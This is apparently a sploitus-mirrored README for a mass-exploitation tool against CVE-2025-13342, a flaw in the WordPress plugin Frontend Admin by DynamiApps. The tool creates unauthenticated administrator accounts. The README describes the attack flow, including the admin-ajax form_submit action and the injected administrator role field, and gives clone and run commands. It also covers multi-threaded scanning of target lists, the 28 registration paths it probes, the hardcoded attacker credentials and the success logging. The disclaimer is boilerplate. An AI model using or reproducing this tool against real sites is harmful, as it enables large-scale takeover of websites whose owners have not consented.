Share 
## https://sploitus.com/exploit?id=7EE94DED-A8FB-51C4-B5FF-B5B8B01EAED9
# CVE-2025-13342
Frontend Admin by DynamiApps <= 3.28.20 - Unauthenticated Arbitrary Options Update
# โšก CVE-2025-13342
## Frontend Admin by DynamiApps โ€” Unauthenticated Admin Creation

```
   __         __    _  _  _  ___    ,________     _
  / ()(|  |_// ()  / )/ \/ )|__    /| __/ __/|  |/ )
 |     |  |  >- ----/|   |/    \----|   \   \|__|_/
  \___/ \/   \___/ /__\_//__\__/    |\__/\__/   |/__
```

[![CVE](https://img.shields.io/badge/CVE-2025--13342-critical?style=flat-square&color=CC0000)](https://vulners.com/cve/CVE-2025-13342)
[![CVSS](https://img.shields.io/badge/CVSS%203.1-9.8%20CRITICAL-red?style=flat-square)](https://nvd.nist.gov/)
[![Plugin](https://img.shields.io/badge/Frontend%20Admin%20%E2%89%A4%203.28.20-blueviolet?style=flat-square)](https://wordpress.org/plugins/frontend-admin/)
[![Auth](https://img.shields.io/badge/Auth-None%20Required-brightgreen?style=flat-square)]()
[![Python](https://img.shields.io/badge/Python-3.8%2B-3776AB?style=flat-square&logo=python&logoColor=white)]()

---

## โ—ˆ Vulnerability

| Field | Detail |
|---|---|
| **CVE ID** | CVE-2025-13342 |
| **Score** | **9.8 CRITICAL** โ€” `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Affected** | Frontend Admin by DynamiApps โ‰ค **3.28.20** |
| **Auth** | **None** โ€” fully unauthenticated |
| **Type** | Insufficient Capability Check + Input Validation โ†’ Arbitrary Option Write |
| **CWE** | CWE-284 ยท Improper Access Control |

**What happens:**  
`ActionOptions::run()` save handler neither checks user capabilities nor validates input before writing to `wp_options`. A public ACF frontend form becomes an open write channel. The attacker sets `users_can_register=1` and `default_role=administrator`, then registers a new account that receives the Administrator role automatically.

**This tool skips that two-step approach** โ€” it directly submits the crafted form payload with `role=administrator` injected into the user creation fields via `acff[user][field_*]`, creating an admin account in a single AJAX call.

---

## โ—ˆ How the Exploit Works

```
1. Crawl common registration paths  โ†’  locate ACF frontend form
2. Parse hidden fields               โ†’  _acf_nonce, _acf_form
3. Map user fields                   โ†’  username ยท email ยท password ยท role
4. POST /wp-admin/admin-ajax.php
   action=frontend_admin/form_submit
   acff[user][] = administrator
5. {"success":true}  โ†’  admin account created
6. Log to acf_success.txt
```

---

## โ—ˆ Requirements

```
requests
beautifulsoup4
colorama
rich
```

```bash
pip install requests beautifulsoup4 colorama rich
```

---

## โ—ˆ Installation & Run

```bash
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py
```

---

## โ—ˆ Usage

The tool is interactive. You will be asked four questions:

```
Targets file path    โ†’  list.txt
Threads              โ†’  10
Timeout (seconds)    โ†’  10
Verbose debug        โ†’  y / N
```

**Credentials are fixed internally:**

| Field | Value |
|---|---|
| Username | `Nxadmin1` |
| Email | `nxploitedtest@gmail.com` |
| Password | `NxAdmin_1337#KSA` |

---

## โ—ˆ Targets File

One host per line โ€” scheme optional:

```
https://target1.com
target2.com
http://target3.com
```

---

## โ—ˆ Scanned Registration Paths

The tool probes **28 paths** per target in order, stopping at the first valid ACF form:

```
/  /register/  /registration/  /signup/  /sign-up/
/user-registration/  /account/  /my-account/
/frontend-form/  /frontend-register/  ...
```

---

## โ—ˆ Output

| File | Contents |
|---|---|
| `acf_success.txt` | Confirmed successful admin creations |

**Format:**
```
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 EMAIL=nxploitedtest@gmail.com PASS=NxAdmin_1337#KSA JSON={"success":true,...}
```

**Terminal:**
```
[+] Target base:  https://target.com
[+] Found form at: https://target.com/register/
    _acf_nonce:  a1b2c3d4e5
    _acf_form:   123
[+] SUCCESS:  https://target.com

[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com
```

---

## โ—ˆ Contact

| | |
|---|---|
| **Author** | Nxploited (Khaled Alenazi) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |

---

## โ—ˆ Disclaimer

> This tool is provided **for authorized security research and educational purposes only**.  
> The author accepts **no responsibility** for any use against systems without explicit written permission from the owner.  
> Unauthorized access is illegal under the CFAA, CMA, and equivalent laws worldwide.  
> **You are solely responsible for your actions.**

---


ยฉ 2025 Nxploited ยท Frontend Admin by DynamiApps โ‰ค 3.28.20 ยท Fixed in 3.28.21